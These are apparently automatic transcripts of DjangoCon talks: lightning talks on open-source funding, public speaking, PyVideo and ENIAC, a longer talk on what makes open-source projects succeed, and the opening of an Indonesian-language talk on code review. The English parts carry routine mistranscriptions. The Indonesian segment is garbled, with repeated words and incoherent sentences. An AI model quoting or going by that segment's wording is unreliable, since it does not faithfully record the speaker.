the Django Fellowship and the REST Framework pay plans. And the key here to me is I think that this is something worthwhile because I think it's in your best interests to do so. Like this is the pitch I want to make to businesses because it's absolutely clear to, you know, it should be clear to everybody that a well-invested open source ecosystem represents a huge competitive advantage to your companies. Okay. And also, although the collaborative funding model is a kind of new business model and slightly atypical, I think it's really compelling because look at it this way around. So myself, Adrian and Tim, we want to work for your companies full time. And there's one pro and there's one con. The catch is we're only going to work on these open source projects that you use. Nothing else. The pro is per company, you only have to pay us a small fraction of a full time salary. Right? That sounds like a good deal to me. So if I'm asking for your money, I think it's very important to be transparent about exactly what I'm asking for. I'm looking for about $65,000 a year in order to make this viable. So it's not a, that's revenue, not salary. So this isn't some huge money scheme, money spinning scheme, but it is enough to support a viable business. Okay? Where we are at the moment, we're starting to get close to the tipping point, right? Getting to the 100% funded level is the thing that will change all of this. And we're starting to get there. So here's the money shop. The plans start, the corporate plans start at $50 a month, okay? And every single one of those makes a significant difference from my side. Every single one. And I want to make it clear, this is an investment, not a donation, okay? So if your company's considering funding, you know, get in touch with me, I will happily help you talk with your business owner about trying to make the case for funding it. Thank you very much for your time. Thank you. My name's Trey. I have a lot of experience with workshops and tutorials and with lighting talks. Until this morning, I had virtually no experience giving a talk longer than five minutes and less than three hours. So I'm going to share with you some tips that I hope will help inspire you to give your first lighting talk. When thinking of a topic, remember that you want to deliver value to your audience. So that can mean reviewing a familiar concept. It can mean teaching folks a new skill. You could shed light on a topic that's a little new or unfamiliar. You could also entertain people with a fun story. You can talk really broadly about a topic or just barely introduce it. You could dive into a topic that's really niche that only a handful of the people in your audience know about. That's okay. When you make a lighting talk, use an outline. Make a bulleted list of points that you'll cover and hone that list down to something that fits in five minutes. The first thing you'll want to do is set expectations. If there's background information necessary, review it or state that it's needed so that people know whether or not they're in your target audience. You only need one takeaway for a five-minute lighting talk. The fewer the takeaways, the better, and don't be afraid to cut things out because you can always elaborate more later. Keep it simple. Limit the number of variables to decrease the likelihood that things could go wrong. For your first lighting talk, use slides. Don't use too many slides, and don't try a live demo. Live demos are really hard to pull off, so don't even try the first time you do a lighting talk. You can always show demos to people after the talk. When showing code blocks, make sure people can read the code on a projector in a well-lit room. Use dark text on a light background. Don't use white text on a black background that looks cool on your computer when you're coding late at night. It's kind of hard to read on a projector based on the way projector technology kind of works. Also make your font size big so that people can read it in the back of the room, and make sure not to put too much stuff on each slide. Write speaker notes. Edit and re-edit those speaker notes, and script your talk as much as you can. You may or may not have noticed it, but I am entirely reading off of my speaker notes, and that's pretty much what I was doing this morning when I gave my talk as well. There is no shame in scripting your talk. It's nice to have your speaker notes memorized, but it's not essential. Performances are fun, and performances are scripted. Ideally, remove non-essential parts that you notice while rehearsing. In the worst case scenario, if you have like 80% of your talk left and 30 seconds to go, what is that 10-second take-away phrase that you can deliver before you say, thank you very much? When you get to the, towards that five-minute time limit, make sure to panic. Sorry. Don't panic. If you're ending too soon, give people your 10-second pitch and move to questions, or end it right there. After your talk is over, take a deep breath and congratulate yourself. If you are an introvert like I am, you just broke the ice. You gave everyone else something to talk to you about afterwards, a reason to find you somewhere else at the conference and introduce themselves to you. That's it. Cool. So my talk's on grass. How do I, there we go. Okay, so how many of you frequented the science, the video? Can you all hear me? Fantastic. Yeah, great. So if you frequented it in the past six months, you probably saw that it's going down. The people that were running that, Will and Sheila, they're just getting tired. They want to move on. And there was a bunch of people that stepped up to say, hey, let's keep this thing going. It's great. Personally, it's where I learned a lot of awesome things about Python and did studying on my own while I was working out or doing the dishes or whatever chores I had. So I ended up being the only person left after a lot of people said, hey, we can help out. I ended up being the only person left that had built a site in time for PyCon. And now we have, while I was at PyCon, got a bunch of people together to continue work on that project. It's not built in Django, sorry, built in Pelican, a static site generator, but it is hosted on GitHub, which makes it super lightweight, super cheap to run. And what I'm here to do is to tell you that, one, it exists. We're always looking for help. We are moving really fast and getting new talks out onto PyTube. SciPy is already up. SciPy ended a few days ago. It's already up for your viewing pleasure. And if you have any questions or want to talk about contributing back, feel free to Twitter me at PaulLogston or just come up to me and talk to me during the conference. Thanks. All right. If I was better prepared and not quite this busy, I would have probably done slides, but we're going to make do with what we can here. So who here has heard of ENIAC? All right, awesome. ENIAC with the first electronic computer in the world. It's made right here on Penn's campus and there are parts of it four blocks away from here. So if you came all this way and you're a geek, don't leave without seeing ENIAC. So here are a couple of things. ENIAC, all the original programmers of ENIAC were women, men considered it beneath them. But not only was the first programming language ever designed, designed by a woman, but the original programmers of ENIAC were women. So go to Django Girls, buy a code like a girl t-shirt, and use it in the picture you're going to take with ENIAC. Find a new friend, somebody you don't know, and make the walk. Felicia Day gave a keynote here a couple of years ago. You may know her from web series like The Guild or TV shows like Supernatural and a bunch of other things that are out there. She was pretty psyched and this got retweeted many times. I am working to try to get in touch with the curator of ENIAC. We've gone back and forth a couple of times to find a time when you could actually open up the entire display so we could do some photo ops like this. So if you want a chance at that, keep an eye on my Twitter. It may be last minute. I'm twitter.com slash flipperPA, flipper like the dolphin, PA like Pennsylvania. Because I'm hoping to put that together to get a couple of people some shots like this, which are really cool. You can actually see the vacuum tubes and everything it took to make four whole K of memory. If you need directions from here to there, it is incredibly complex. You are at 3730 Walnut Street. It is a seven minute walk to 3300 Walnut Street where you see the pin. You can walk down to 33rd Street, turn right, and the first entrance on 33rd Street on your right is the ENIAC display. There is a signpost outside on 33rd Street that says ENIAC. So go see ENIAC if you get a chance. It's absolutely awesome. This is Paul Schaefer, the curator. He is not the guy from David Letterman. Also at 37th and Ludlow, that is if you go down to 37th Street and turn left, there's a walkway in between Chestnut and Market, aka on the way to Han Dynasty, where you can see the monument where in 2015 we inducted the original six women of ENIAC to our technology walk of fame here at Penn, which is a pretty big deal. This is one of my favorite spots on Penn's campus. It was long overdue that we credited these six pioneering programmers with the honors they all deserved. So lightning talks don't have to be five full minutes. Mine is not. Keep that in mind for the next time you give a lightning talk. You can do it in 30 seconds. Now, thank you.
|
Lightning Talks by Many People 00:04 - Adrienne Lowe 06:33 - Russell Keith-Magee 09:42 - Tom Christie 15:14 - Trey Hunner 18:39 - Paul Logston 20:28 - Timothy Allen
|
10.5446/32708 (DOI)
|
Come on, y'all! MUSIC MUSIC MUSIC MUSIC MUSIC MUSIC Well, hello again, Philadelphia. As we just had, my name is Russell Keith McGee. If you've heard my name before, it's because I'm a member of the Jango Corps team, and I have been coming up on 11 years now. I've served on the technical review board for the 1.7, 1.8, 1.9 releases. I'm also on the security team. Jango is an open-source project, but it's not the only open-source project I'm associated with. These days, I'm mostly spending my time on the Beware project. Beware is an open-source collection of tools and libraries for creating native user interfaces in Python, desktop, but also for iOS, Android, and single-page web apps. And I've been associated with a bunch of other open-source projects over the years as a user, a contributor, and project maintainer. So, earlier today, I spoke about some of the known and factual aspects of open-source projects that you need to be aware of, things like legal issues and sort of burnout and depression issues. These are well-studied, have well-known causes, well-known resolutions. There's all very, very factual stuff there. This talk, however, isn't about that hard data. This is about how to make your project successful. Now, the thing that I want to flag here up front is the very distinct risk of cargo cullting. Cargo culls are a phenomena that came out of World War II. There were a lot of Pacific islands filled with people who weren't, you know, modern Western civilizations. And their first experience with meeting Western civilizations was that these people would turn up, and these large metal sky birds would come down and deliver large amounts of food and housing materials and all sorts of vehicles and interesting things. And then a couple of years later, they all disappeared again. They started building these giant bamboo structures to try and bring the sky birds back again. They'd flatten out large pieces of land and set burning pyres along the side, because there was always lights at the side of these sky birds with land. So we ended up with entire cultures building landing strips for planes that were never going to come because they didn't understand why the planes were coming in the first place. Cargo cullting in technology can be very, very easy to do. And you say, okay, this project did this, this project is successful, therefore I must do this. The one thing that I will assert, and I hope it's not too controversial, is you can't be an underpants gnome. For those who don't know about underpants gnomes, it's a joke from Southpac. The underpants gnomes are these little creatures that sneak into your bedroom at night, and they steal your underpants. Why? Because they've got a business plan. Step one, they steal the underpants. Step three, profit. They can't ever explain what step two is, though. If you're really, really lucky, you might have a massive success, just accidentally happen to you. But more realistically, you're going to have to work at it. And that preparation starts with knowing what kind of project you've created and what your commitment to that project is going to be. Now, I would argue there are two main sources of open source project release. The first is the simple, you might find this useful release. It's where you're not really looking to start some major project. You're not trying to write the next jango. You've just got a thing that you've done, and it's no harm to me if I put it out there, and you may be using it as well. You might find it useful. Who knows? This is essentially the spirit behind the scientific method generally. In the movie Awakenings, it's based on a book by Oliver Sacks, stars Robin Williams. The main protagonist is a researcher. He's been quizzed about his PhD, where in which he describes as an epic project, I was to extract one dechagram of myelin from four tons of earthworms. I was the only one who believed in it. Everyone else said it couldn't be done. And his inquisitor says, it can't. And the response is, yeah, I know that now. I proved it. So you might not even be talking about a successful project here. It might just be something where you're tinkering to see if something might be viable, or it might be something you've used in production, or you don't have any particular commercial interest in it, but you might as well put it out there so someone else can look at it. You're not trying to start something. You're just trying to help the community by letting the world know that you've done something that might be used as a starting point, or an inspiration, or as proof that it just doesn't work. The other approach is where you're throwing things out there, and you actually want people to use the project. You're planning to continue working on it. You'd like other people to use it too. And in an ideal world, you get contributions from other people that can improve your code base. This is where you think you've got the next Django in your hands, and it doesn't necessarily have to be something the size of Django. It can be a small project, but you're putting your flag in the dirt to say, I'm the go-to library for X. But it's incredibly important to know which type of project you're releasing. And if you're just throwing it out there, you're not making a commitment to maintain it, that's fine. But if you're asking people to intellectually invest in your tool, your framework, your library, then you've also just signed up to pay attention to that community. And to be clear, I'm not saying you're therefore obliged to fix their bugs for free. I'm saying that you're putting something out there and representing it as something that you intend others to use. You've just started a dialogue, and you've started to set expectations. So the key thing here is you need to know what you're trying to do and then communicate what you're trying to do, communicate your intentions. If you find a project, and it says in Banner Text in the readme, this is an experiment that I've abandoned, then you know what to expect. If it says nothing, the default interpretation is almost always going to be, this person wants me to use their project. So consider yourself as a user. If your project website says, RetroIncabulator is the best framework for prefabulating your differential girdle spring, and you've got a differential girdle spring that needs prefabulating, who doesn't, you're going to be excited. You've just found a project that solves your problem. And when it turns out that it only prefabulates non-reversible differential girdle springs, you're going to log above, or try to submit a patch, or try to engage with the project in some way. After all, why would this person have put it out there if they didn't want it to improve? And if the project maintainer then doesn't respond or respond slowly, respond ambiguously, or worse, respond angrily, you're just going to get annoyed at the project. And the project maintainer has then just lost a potential community member. Although, as an interesting aside, we would all, as human beings, do a lot better to get in the mental habit of thinking of open-source projects as you might find this useful by default, rather than everybody please use this by default. Assume by default you're going to get no support, unless the project says you will. Don't assume you're going to get support, and then be surprised when you don't. And don't forget, a project can change over time. A couple of years ago, I was maintaining a library called Casuary, which is an implementation of a well-known constraint-solving algorithm. I published it because I was, at that time, using it as part of Togo, a widget toolkit. I've recently changed Togo to use a CSS-based approach, so I no longer need the capability that Casuary implements. But to make sure there's no confusion over the status of the project, the project website now lists it under an attic section of the BWARE homepage, and at the top of the readme, it says the same. I'll still merge pull requests, and if someone wants to take over the project, they're more than welcome. But I've made it clear that it's not the focus of my attention anymore. So, you know what you're trying to achieve with your project, and you've communicated that effectively. So, what comes next? I would suggest the next thing you need to look at is your project's out-of-box experience. The experience that a new user has when they discover your project for the first time. Imagine someone knows nothing about your project, your code. They visit your website. What do they find? Django's out-of-box experience is a good example here. If you visit Django's website, you're invited to do a tutorial. Sorry, there's a brief description of what Django is, and which invites you to do a tutorial. You follow the steps, and about the only decision you really need to make along the way is what database you have to use, and even then, it strongly says, just use SQL like for your first pass. Your path to getting started is clear. You don't have to make a whole lot of decisions, and you should, at the end of a four-page tutorial, get a running project with a decent feel of what the project can do. If users can't find your tutorial, or they can find it, and it doesn't work, they're going to assume that either the problem is in them, or that they're stupid, and either result isn't good for your project. Cathy Sierra is a tech writer and blogger. She wrote a blog post entitled, Attenuation and the Suck Threshold, in which she talks about user engagement on new projects. What she says is, when you're introducing a person to a new project, you need to make their time from zero to kick-ass as low as possible. A new user has to go from, I know nothing about this project but the name, to kicking a real world, practical and personally applicable goal, as quickly as possible. If that time is low, the user gets an immediate sense of progress, and a little endorphin rush in their brain, and they get over that suck threshold, they feel like they can do anything, and they're more likely to persist and go to the next step. Even if those little steps are a little bit harder, and every time that they kick a little bit more ass, they get a little bit closer to doing more and more advanced things. The more likely they are to give up, the more likely they are to develop a negative impression of your tool or product. Every decision a new user has to make during the tutorial process is one more thing that can make it harder to get over that suck threshold. Every dead end they go to in your documentation tree makes them feel that little bit more stupid. And they're not stupid. You've just failed to communicate effectively with your most important audience, new users. Marketing people like to talk about conversion funnels, because it helps to think about your open source project in a similar sort of way. The use of an open source project doesn't stop with becoming a user. If you're going to have a vibrant, long-running project, you want people to work their way all the way down the conversion funnel. They come to you as potential users. The entire population of the plan is effectively a potential user. Some of those people will do the tutorial and become new users of your project. Some of those people will continue to use the project, find some real practical use for it and become actual users. Some of those users will hang around and become long-term community members. Some of those community members will eventually become contributors. Some of those contributors will join your core team and eventually some of them will move into leadership positions. Unless you are working on that entire funnel, that entire conversion funnel, your project will at some point stall. That means you also don't just need a first-time user tutorial. You need a first-time contributor tutorial. You need to document your processes. So the potential contributors can move their way down this process or down this funnel. Django does this fairly well. The contribution process is very well documented. At the sprints, there's always someone who's leading the process to say, hey, let's get involved. It's something that I think I've been able to do quite well with B-Ware so far. With open offers of mentoring and with the Challenge Coins, trying to encourage people to get involved. It's not just about getting users though. You have to be able to retain those users over time. Which means you have to think about what users need in the long-term, such as the role that backwards compatibility plays in long-term project viability. Django has a backwards compatibility policy, which guarantees that code running today will continue to run for quite some time in the future. At least two release cycles. And then there's also a long-term support release to go even longer. Other projects deliberately break compatibility between point releases. How much does this matter? It depends entirely upon your perspective and your intended audience. If you spend your life working on short-term contracts, delivering sites with no long-term maintenance overhead, say your promotional website for an event or a site supporting an advertising campaign, you don't have long-term problems. You finish your job, you move on to the next one. Every time you start, you're free to try something new, experiment a little bit, replace something that didn't work well last time. You're looking at the world through glasses which think of six months as a long time. However, if you're engaged in a multi-year project, you really care about long-term maintainability. In a former life, I was involved with the Joint Strike Fighter project. It's a multi-billion-dollar project to develop the next generation fighter for the US Air Force. And at the point of conception of the project in 1990, they didn't anticipate delivering a working airframe for 20 years. And at this point, it's six years late. And before it became operational, they were planning on doing two full rebuilds of the avionics subsystems. If you're in this space, you really care about long-term maintenance. You don't want the world shifting underneath you every three months. You can't use a product that doesn't have a 10-year support plan in place. Six months is a rounding error. It's a series of meetings with your supervisor. Another example of this is a quote from Massey Seglowski from Pinboard. A rule of thumb that has worked for me is that if I'm excited to play around with something, it probably doesn't belong in production. And I agree with him. Excitement is not a property I aspire to when I think about my production servers. Boring is a virtue in production. Boring is predictable. Boring doesn't wake you up at three o'clock in the morning having trashed half your database. Now, to be clear, I'm not saying one approach is right and one approach is wrong. I'm saying that the properties you value in a project depends on your perspective. And that perspective is something you need to communicate so that users know what to expect. You also can't just focus on your own project and your needs. You need to look at the broader community, the ecosystem in which your tool sits. To explain this, I'd like to take a quick tangent here and talk about tractors. One of the project founders of Django is a man named Jacob Capron Moss. Unfortunately, not here this week. Jacob is a man of many tongues. But until recently, one of his biggest passions was his farm and his tractor, named Tinkerbell. One of the interesting features of farm tractors, not something we usually think of as a bastion of high tech, is a feature of something called the three-point linkage. The three-point linkage is a system that has been used on tractors for almost 90 years. It was originally developed in the 1920s by Ferguson and then was adopted by pretty much every farming equipment manufacturer and tractor manufacturer. It was eventually encoded as an ISO standard in the 1980s, but that was really just codifying what everyone already agreed on. What the three-point linkage does is provide a very simple interface that enables plows, cedars, harvesters, whatever else, to be attached to any tractor you want. And, hitting the backwards compatibility point, it's been consistent for 90 years. A farm tool built in the 1930s will connect to a tractor that came off the assembly line last week and vice versa. What the three-point linkage does is change a tractor from being a single purpose tool into being part of an ecosystem of tools. When you buy a tool, you get a tool and you can buy a fine set of tools. The real tool power comes when the tools are able to work together. When you buy into an ecosystem, you get infinitely more value because you're not just buying a tool. You're buying into all the possible ways that tool can be combined with everything else in the ecosystem. No tool lives in a world of its own, especially in computing. So pay attention to the rest of your community and work with that community and their expectations. This is really just Metcalfe's law writ large. Django by itself is not that exciting. It can do stuff, sure, but it's limited. What's exciting is the ecosystem of stuff around it. Every time someone writes a plug-in or a library that's part of the Django ecosystem, every other package gains some value because it's compatible with all the other bits. There's something like 4,000 packages on PyPI that are tagged as being Django-related with Django-compatible. Now, even if you consider Sturgeon's law that 90% of everything is crap, that's still 400 useful packages. This is something that Django does quite well at a technical level, but it doesn't do it well at a social level. Django's app architecture encourages people to build distributed apps for specific tasks. As a project, though, Django doesn't do a good job at highlighting those apps in the community as a whole and the value that's been added in the community. There are sites like Django Packages, but Django's core infrastructure doesn't ever reference those sorts of tools. That limits the usefulness of Django Packages because it's not a hub that everyone who comes to the project knows about. If you're paying attention, what you'll notice is a recurring theme here, the importance of communication. It's not just a matter of what you're saying, it's how you say it, how the message gets out there. Django wasn't the only Python web framework that was launched around 10 years ago. About that time, there was also CherryPie, Turbogears, ReposeBfg, QuickShoutHands. 10 years later, who's heard of those three? We've got maybe a quarter of the audience. Okay, so Turbogears and ReposeBfg kind of merged and reformed and ended up as pyramid. Why was that rebranding necessary? Well, if Turbogears had been successful, it wouldn't have needed to merge with anything. It would have been the Django of today. So why did Django, for want of a much better word, win? Was it because Django is technically superior? Well, I've had more than one discussion with Pyro Pyramid advocates who have told me at great length that Django doesn't wrong. And let's say they're right. They've certainly got some valid technical arguments in there. If that's the case, how did a technically inferior product win? Django, I would argue, won because the publicly communicated narrative about Django was a lot more coherent. It resonated better with the audience that reached. Django's tutorial and the onboarding experience was a lot better. Django's documentation and community meant the ongoing experience was better. These factors, messaging, onboarding, user experience, these are sales and marketing factors. Django won because of better sales and marketing. I'm not saying we had better banner ads. It won, for want of a better word, because it was better at getting the message out. I've also had this from the other side. Eight years ago, I started a project called Django Evolution. It was a migration framework for Django. And at the very first DjangoCon nine years ago, I, oh, sorry, eight years ago, I participated in a panel discussion with Simon Millison and Andrew Godwin, who are the three maintainers of the three migration frameworks at the time. And I think at the time, the other two actually weren't publicly available. They were like released as a result of being on the panel. South was available. And of course, as we all know, Django Evolution was eventually moved into Django Core as part of the 1.7 release. No, wait, hang on. Oh, wait, that was south. So I was first to market. What happened? I got tagged very early on with the label that Evolution was magic. And I never managed to shake that. I never managed to reshape that narrative. I completely failed at sales and marketing and the rest is history. So don't just write off sales and marketing. Don't get me wrong. Many sales people in their tactics make my skin crawl. But that doesn't mean that sales and marketing isn't important. It's just the opposite. It's incredibly important. But it does mean it needs to be done well. And marketing that works well for you may not be the marketing that works for your target audience. And it's not just about open source either. The same is true for any commercial endeavor. Buy me a whiskey and ask me how I know. Okay, so what works and what doesn't? What I'm going to do now is what is scientifically turned a wild ass guess. Or to use the proper Django nomenclature a wild ass guess. I don't have any hard data to back this up. This is entirely anecdotal. I have no reason to believe that I'm right. I've been involved with successful projects. That doesn't mean the projects that I'm involved in are successful because of these things. I just think these are probably the causes. And there are almost certainly factors that I've missed. Okay, so why was Django successful? Well, it was in the right place at the right time. We were in a world where we'd be living with great big Java web frameworks. And Django came in and was able to show you how you could build a blog in 10 minutes. It was a breath of fresh air with a new dynamic language. And the existing set of tools and whatnot that were available were very, very heavyweight. It had extremely good documentation from day one. Day one, you landed on the project page and there was pages and pages and a fantastic tutorial that walked your way through. My first experience of contributing to Django was basically coming in, finding the project, and discovering that it couldn't do one little odd thing. And then because the documentation was so good about explaining what it should have done, combined with the fact that Python is a really easy language to sort of read what was going on, contributing a major patch, and basically within a month I was a member of the core team. Now, okay, this is like 11 years ago, so there was a lot more momentum. But the fact that that was able to happen, the fact that that path, that onboarding path, was so easy, is part of the reason why Django was successful. It also got set up very, very early as a very nice community. I don't know this was an explicit decision, but Jacob and Adrian were very, very aggressive about clamping down on anybody who was rude on mailing lists. And as a result, the mailing list, generally speaking, stayed very, very polite. It made it a very welcoming community and a great place to hang around. Django Revolution, the exact opposite. It was in the right place, it was in the right time, but it did badly communicate the message. Cricut is another project I've been involved with. It's a graphical test runner. It was a very controversial idea. And so I didn't really manage to convince people of the idea. It had some odd graphical choices. It was using Tickle TK. And then I didn't follow up because when I found out the limitations of Tickle TK or that I was starting to get against, I kind of haven't gone back and really refreshed that project. Beware, on the other hand, is one that I'm particularly proud of. I founded the project and so it's really kind of been the focus of all the things that I've observed over the years. So, in my opinion, it's a combination of everything that I currently see to be how you are successful as an open source project. First off, it's an umbrella project. Beware is one name wrapping around a whole lot of smaller projects. That means I'm not trying to build a brand around each one of my little libraries. I'm building one big brand, Beware, and then directing people and following people to all the individual parts. That has the additional benefit that it's a lot easier to understand the whole picture because you can understand what this does and what this does and what this does and then you can see the path of how they were connected rather than trying to understand the entire blob at once. I've been very, very careful to be aggressively nice. This is something that I've kind of learnt from the Olas in Django Girls. They are in their public emails, public communications, absurdly friendly and nice and gregarious and bubbly. Initially, that felt a little odd, but when you do that, it actually, one, makes yourself feel really kind of good because you're not focusing on the negative, you're focusing on the positive all the time. People like to feel positive. Who would have thought? I've been very aggressive about outreach. Going aggressively after new maintainers and saying, you want to contribute to Beware? I am there. I will help you become a Beware contributor. I will be your mentor. I will help you get over that line. I will help you get your commit bit. So, focusing on that onboarding process. What does it look like to become a new user? What does it look like to become a new contributor? And rewarding those contributors with things like Challenge Coins and every time that something does happen that is a notable event, a new person joins the project, a new person does something that's complex, tweeting about it, making a bit of noise on social media and acknowledging all contributions, not just code. Things that have done socially, people who have written documentation, people who have contributed to the broader ecosystem, people who have contributed to other projects that have helped Beware. I've been very vocal on social media. Getting out there regularly, maintaining a cadence of saying things about your project, getting people saying, hey, look, this thing is out there. This project exists. Just knowing that it exists is part of the whole exercise with sales and marketing because you've got to be in the front of people's minds all the time. I've also had a very balanced attitude to accepting patches. In the days of Django, particularly my own early days of Django, if a patch was a perfect, I wouldn't merge it. I'd probably go and say, take that patch and I'll fix it for you. In Beware, I've kind of relaxed that a bit. I've fallen back onto the world where the test suite tells you whether it works. You look at the code, is the code better for being in rather than out? Does one more test pass? Does one more edge condition go? You can always clean up the architectural stuff later. That means that you get more people in and you don't get people tied up in really, really convoluted, you know, project acceptance procedures. I've come to that. We've also automated a lot of these project acceptance procedures, automating continuous integration tests, automating linting checks. I've also been very careful to set community expectations around community culture, that money is a part of this story. We are not expecting this to be everybody volunteered. We want money to be part of this. We want a healthy lifestyle, a healthy mental attitude to the project to be part of the project. So that later on down the line, when we do get to the point where maybe there are commercial organizations involved, we're not tied with this internal schism of, oh, no, it must be free, oh, no, it must be paid. Setting right now, it's going to be paid because that's the way you make things sustainable. All of this really comes down to the old quote from Pascal, fortune favours the prepared mind. If you want your project to be successful, you need to plan for that success. It takes years to become an overnight success. I've benefited from being part of a large and successful project like Django. I'm on the very early stages of what I hope will be a similar journey with BeWare. The things I've spoken about today, both in this talk and the one I gave this morning, represent the sum total of the knowledge I have about being successful. You'll notice though how little of it has to do with the technical aspects of the code. Open source projects are ultimately about communities. Communities of people with aligned interests acting collectively. This means that issues of communication, collaboration, social justice, inclusivity, these are intertwined with technical aspects because without the soft aspects, the hard aspects can't be done. This is something that's taken us collectively as an engineering group a long time to learn. And it's taken something where it's taken a long time to establish best practice. And we've still got plenty to learn. The key is to pay attention to it. Keep your ears open and your mouth shut and look for ways to improve the social aspects around your project and improve your communication. Thank you all very much. Thank you. Thank you. Thank you. We have the room for three more minutes so you can either ask the world's shortest question or you can take your questions outside afterward. I'll also say the challenge coins, anybody, I'm here till the end of the week to sprint. So if anybody does want to become a call contributor, I can guarantee you will have one of these by the end of a two-day sprint. Probably even sooner than that, we gave out 48 of them at Parkcon US. So I'm also actively looking for benefactors and sponsors to help me continue to be aware. So if you or your company might be interested in pitching in or hiring me, come talk to me. Yeah, I'm also going to be doing Tim Tanch Lands up in the mezzanine in a bit. What's your challenge for the world? Come and ask me and I'll tell you. What's a challenge coin? A challenge coin is one of these. It's a coin that you get if you complete a challenge. If you go to pybebe.org, there is a list under the contribution section that says challenge coins and gives the full story. Awesome, thank you so much. Thank you.
|
So you've written a bunch of code, and you think others might find it useful. You open source it, and... profit, right? Well, no. PyPI is filled with thousands of projects that have been released with the best of intentions, but never really break into the mainstream. How do you escape this trap, and maximize the chance that your project will actually be used, grow and thrive?
|
10.5446/32709 (DOI)
|
Ayo, ya! Semuanya, saya sangat gembira untuk berada di sini. Ini adalah pertama kali saya di Jengokong dan pertama kali saya di Philadelphia. Jadi, sedikit lebih banyak tentang saya. Saya bekerja di Frankugur, Kanada. Saya bekerja di Jengokong dan saya juga penjelasan untuk menjelaskan kode. Ini adalah pembicaraan non-profit. Kita ada penjelasan yang berbeza untuk wanita dan anak-anak untuk menjelaskan kode. Jadi, saya bercakap tentang kode dan cara untuk membuat mereka lebih terutama. Jadi, kita berpikir sedikit tentang kode ini. Kode yang terlalu mudah, dua pembicaraan yang mudah, sepertinya seperti pasmur. Pembicaraan yang terlalu mudah, orang akan melihat, menulis komentar. Untuk saya, kode yang terlalu mudah, terutama saat saya menjelaskan kode, itu sangat menyerangkan. Sepertinya semua orang sangat terlalu sikap untuk mencari kode. Semua kode, setiap lata, untuk membuat kode yang terlalu mudah. Orang akan beritahu saya apa yang saya lakukan yang salah. Itu bukan praktis yang terbaik. Saya tidak selalu tahu apa yang terbaik. Mereka akan beritahu saya untuk mengordurkan penjelasan yang saya berharap harusnya di grup setelah itu. Orang yang terlalu mudah. Setelah saya menurut, informasi saya sudah tidak terlalu salah. Semuanya harus diberi. Saya merasa seperti salah. Saya membuat banyak salah. Mungkin saya tidak baik. Mungkin saya tidak harus berada di setelah itu. Sebelum saya mengalami penjelasan saya, saya harus mengalami penjelasan saya. Jadi saya mengalami penjelasan saya di kota yang paling literal. Penjelasan di file javascript saya, saya membuat mereka menjadikan. Tapi saya tahu saya salah. Saya minta maaf, saya membuat keputusan ini. Tapi itu tidak berhasil mengejutkan penjelasan untuk ini. Mengejutkan beberapa penjelasan, membuat penjelasan yang berbeda. Menjadikan beberapa tempatnya. Saya tidak pasti ini adalah kata-kata yang menjadikan. Saya membuat penjelasan. Mereka berbicara, mereka memikirkan bahwa mereka berjalan-jalan. Bukan orang ingin kembali. Menjadikan penjelasan. Kita juga memiliki tempat yang tidak memilih penjelasan. Mereka lebih suka membuat penjelasan. Mengejutkan penjelasan. Dan menjadikan penjelasan. Saya tidak akan menghentikan waktu. Saya tidak akan menghentikan penjelasan yang kita ingin. Mengejutkan penjelasan. Semua orang tidak menghentikan. Penjelasan kan benar-benar menjadi keputusan yang tersebut. Kita akan mulai minta, apa yang ini? Apa yang kita lakukan? Kita tahu ini sebagai kepercayaan, tapi juga sebuah pembentangan di perangkatan. Penjelasan. Mungkin kita tidak perlu. Mungkin kita bisa mencoba pembentangan. Mereka tahu cara membuat penjelasan. Mungkin mereka akan menulis penjelasan setiap masa. Jadi kita tidak perlu. Mungkin. Saya tidak tahu. Kita bisa menjawab, apakah ini yang kita lakukan atau tidak. Saya rasa sangat penting untuk tahu kenapa kita tidak lakukan di tempat pertama. Penjelasan tidak hanya tentang kepercayaan, tidak hanya tentang kepercayaan, kepercayaan, kepercayaan. Ini juga tidak tempat untuk mengawal seseorang. Ini tidak tempat untuk mencubanya siapa yang baik atau yang tidak. Sebagai program yang baik. Anda mungkin mendapatkan keputusan bahwa penjelasan tidak membuat kepercayaan untuk diperlihatan. Jadi Anda memuatkan, menggantikan, kepercayaan baru. Itu tidak tempat untuk menggantikan cara negatifnya bisa menjadi penjelasan yang baik. Mungkin kita akan membuat kepercayaan yang baik. Karena kita beritahu tentang kepercayaan. Pada pertanyaan, apa kepercayaan yang baik? Saya tahu yang beberapa orang akan meminta kepercayaan yang baik. Tapi ada lebih banyak hal yang berarti kekuatan yang baik dan hanya kepercayaan. Kepalauan. Anda ingin mengikuti semua kepercayaan? Hal yang baik seperti kepercayaan yang baik, kepercayaan yang baik, kepercayaan yang baik, ada banyak hal yang berarti. Ada unitnya? Ada cukup kepercayaan? Pembedahan, juga penting, Anda ingin menikmati. Beritahu tentang kepercayaan. Hal yang baik bisa dikawal mungkin? Beritahu tentang kepercayaan. Ada banyak hal yang berarti kekuatan yang baik. Bukan tergantung pada kepercayaan ke-8. Hal yang baik adalah kita tidak ingin memperkenalkan kepercayaan. Kita ingin pastikan mudah menjaga. Dan itu sebabnya kita ingin menghubungi extra-extra-extra kesejuan dalam pembentangan. Kita tahu hal yang tergantung. Kita tahu hal yang tergantung. Kita tahu hal yang tergantung. Dan Anda lihat sesuatu yang harus dibuat, Anda lihat sesuatu yang bisa diperbaiki. Beritahu tentang hal yang berarti kekuatan yang baik. Bantu mereka lebih baik dikawal. Ini berhasil? Jadi, kita mulai dengan mencoba menunjukkan bagaimana untuk dikawal mungkin? Dan Anda mungkin ingin memberi membuat pengen program dengan mereka jika itu sangat berkeliling. Mungkin mereka baru dengan hal ini, dan mereka tidak tahu banyak. Biar mendapatkan keberkacauan. Mungkin Anda pergi ke Picon, Anda pergi ke JangoCon, Anda akan belajar tentang banyak perkara baru. Dan pekerja Anda tidak. Anda harus berbagi dengan tahu supaya mereka bisa belajar. Dan pake pake code yang berikutnya lebih baik. Pertama melakukan review code adalah untuk pake pake belajar dan memahami kawal. Saya pikir beberapa kami mungkin sudah lupa kekacauan ini. Saya tahu saya sudah lupa. Saya pikir pada awal saya tidak memqualifkan untuk melakukan review code. Saya tidak tahu bagaimana untuk berkata. Tapi kebenaran dengan memperkenalkan interview, memperkenalkan pembentangan, meminta pertanyaan, memperkenalkan banyak pake code, saya dapat belajar banyak. Saya menjadi lebih baik programer pake review code. Ada jika ada kekacauan, pake review code adalah waktu untuk pake pake pake pake pake pake pake pake dan meminta pertanyaan apabila programnya ber�am mereka tahu bagaimana untuk menjawab pertanyaan. Jangan menunggu 6 bulan untuk tanya, apa pake code ini? Ini yang dipanggil pake pake pake pake. Anda sentiasa ingin pastikan ada orang lain dalam teman yang tahu tentang code. Pake review code itu penting, Ini penting. Kami berpengaruh tentang kualitas, 